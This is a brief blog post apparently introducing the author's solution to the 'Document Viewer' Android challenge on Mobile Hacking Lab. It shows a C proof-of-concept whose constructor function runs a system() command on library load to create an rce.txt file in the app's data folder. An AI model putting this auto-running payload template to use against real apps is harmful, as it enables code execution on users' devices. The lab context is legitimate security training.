Document Viewer
Hello everyone , In this blog post , I will try to explain my solution steps for Document Viewer challenge from Mobile Hacking Lab Platform . i hope it will be useful for you

image.png

#include <stdlib.h> __attribute__((constructor)) void execute_command() { system("touch /data/data/com.mobilehackinglab.documentviewer/rce.txt"); }

Last updated